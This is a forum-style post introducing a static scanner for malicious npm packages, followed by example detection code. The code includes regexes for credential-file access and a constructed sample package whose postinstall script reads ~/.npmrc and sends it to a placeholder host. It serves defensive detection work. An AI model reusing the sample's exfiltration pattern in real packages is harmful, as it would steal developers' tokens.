Over the past year several major npm supply-chain incidents had no CVE. They were intentionally malicious packages, not vulnerable ones, so database-driven scanners passed them clean.
That raised a question for me. If zero-day supply-chain malware is not vulnerable software, what does it actually look like at the code level?
I built a scanner that analyzes published npm tarballs directly and looks for correlated behavioral signals rather than known advisories. Things like secret file access combined with outbound network calls, install hooks invoking shell execution together with obfuscation, or sudden behavior drift between versions.
In testing across 11,356 real packages this approach reached 99.95 percent precision and 99.44 percent recall with four false positives in roughly 3,000 clean packages. The analysis is deterministic static inspection with no LLM involved.
It runs as a CLI or GitHub Action and only triggers when package.json or package-lock.json changes, so it can be used as a dependency intake check rather than gating every merge.
Would appreciate feedback from people running production Node systems, especially around where you would place this in your CI workflow.
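The correlated-signal idea from the post, as an added example that is not the author's scanner: each raw signal (secret-file reads, outbound network calls, install hooks, shell execution, obfuscation) is cheap to spot and noisy on its own, so the rules only fire on combinations, and a version-drift check reports which signals a new release gained. The package shape (`{ manifest, files }`), the regexes, the rule set and both sample packages are assumptions constructed for this example; a real scanner would read the files out of the published tarball instead.

```javascript
// Added example, not the post's scanner: correlated behavioral signals over an
// npm package's manifest and source files. Assumed input shape:
//   { manifest: <parsed package.json>, files: { "<path>": "<source text>" } }

// Raw signals (constructed regexes; a real tool would use an AST, not regex).
const SIGNALS = {
  SECRET_FILE_ACCESS: /\.npmrc|\.ssh\/|\.aws\/credentials|JSON\.stringify\(process\.env\)/,
  OUTBOUND_NETWORK: /\bhttps?\.request\(|\bfetch\(|\bnet\.connect\(|\bdns\.resolve\(/,
  SHELL_EXEC: /child_process|\bexecSync?\(|\bspawn(Sync)?\(/,
  OBFUSCATION: /\beval\(|new Function\(|String\.fromCharCode|(\\x[0-9a-f]{2}){4,}|Buffer\.from\(["'][A-Za-z0-9+/=]{40,}["'],\s*["']base64["']\)/,
};

// Lifecycle scripts npm runs automatically during install.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Set of raw signals present anywhere in the package.
function collectSignals(pkg) {
  const found = new Set();
  const scripts = (pkg.manifest && pkg.manifest.scripts) || {};
  if (INSTALL_HOOKS.some((hook) => hook in scripts)) found.add('INSTALL_HOOK');
  for (const src of Object.values(pkg.files || {})) {
    for (const [name, re] of Object.entries(SIGNALS)) {
      if (re.test(src)) found.add(name);
    }
  }
  return found;
}

// Correlation rules: a rule fires only when every listed signal is present,
// which is what keeps a lone https.request() in a client library from alerting.
const RULES = [
  { id: 'credential-exfiltration', severity: 'high', needs: ['SECRET_FILE_ACCESS', 'OUTBOUND_NETWORK'] },
  { id: 'obfuscated-install-exec', severity: 'high', needs: ['INSTALL_HOOK', 'SHELL_EXEC', 'OBFUSCATION'] },
  { id: 'install-shell-exec', severity: 'medium', needs: ['INSTALL_HOOK', 'SHELL_EXEC'] },
];

function scanPackage(pkg) {
  const signals = collectSignals(pkg);
  const findings = RULES.filter((r) => r.needs.every((s) => signals.has(s)))
    .map((r) => ({ id: r.id, severity: r.severity }));
  const verdict = findings.some((f) => f.severity === 'high') ? 'block'
    : findings.length ? 'review' : 'pass';
  return { signals: [...signals].sort(), findings, verdict };
}

// Behavior drift between versions: signals the new version has that the
// previous one lacked. A patch release that suddenly gains an install hook
// plus network access is the pattern worth reviewing at dependency intake.
function signalDrift(prevPkg, nextPkg) {
  const before = collectSignals(prevPkg);
  return [...collectSignals(nextPkg)].filter((s) => !before.has(s)).sort();
}

// Constructed sample packages (not real npm packages). v1 is a plain HTTP
// client; v2 adds a postinstall script that reads ~/.npmrc and sends it out.
const CLEAN_V1 = {
  manifest: { name: 'demo-client', version: '1.0.0', scripts: { test: 'node test.js' } },
  files: { 'index.js': "const https = require('https');\nmodule.exports = (u, cb) => https.request(u, cb).end();" },
};
const MALICIOUS_V2 = {
  manifest: { name: 'demo-client', version: '1.0.1', scripts: { postinstall: 'node setup.js' } },
  files: {
    'index.js': CLEAN_V1.files['index.js'],
    'setup.js': [
      "const fs = require('fs'), os = require('os'), https = require('https');",
      "const { execSync } = require('child_process');",
      "const tok = fs.readFileSync(os.homedir() + '/.npmrc', 'utf8');",
      "https.request({ host: 'example.invalid', method: 'POST' }).end(tok);",
      // constructed base64 blob standing in for a hidden second stage
      "eval(Buffer.from('Y29uc3RydWN0ZWQtc2FtcGxlLXBheWxvYWQtbm90LXJlYWwtY29kZQ==', 'base64').toString());",
    ].join('\n'),
  },
};

console.log(JSON.stringify(scanPackage(CLEAN_V1)));      // verdict: pass
console.log(JSON.stringify(scanPackage(MALICIOUS_V2)));  // verdict: block
console.log(signalDrift(CLEAN_V1, MALICIOUS_V2).join(', '));
```

The clean version trips one signal (outbound network) and no rule, so it passes; the malicious version trips all five signals and every rule, and the drift check reports exactly the four signals that appeared between 1.0.0 and 1.0.1, which is the output a CI intake gate would attach to the pull request that bumped the dependency.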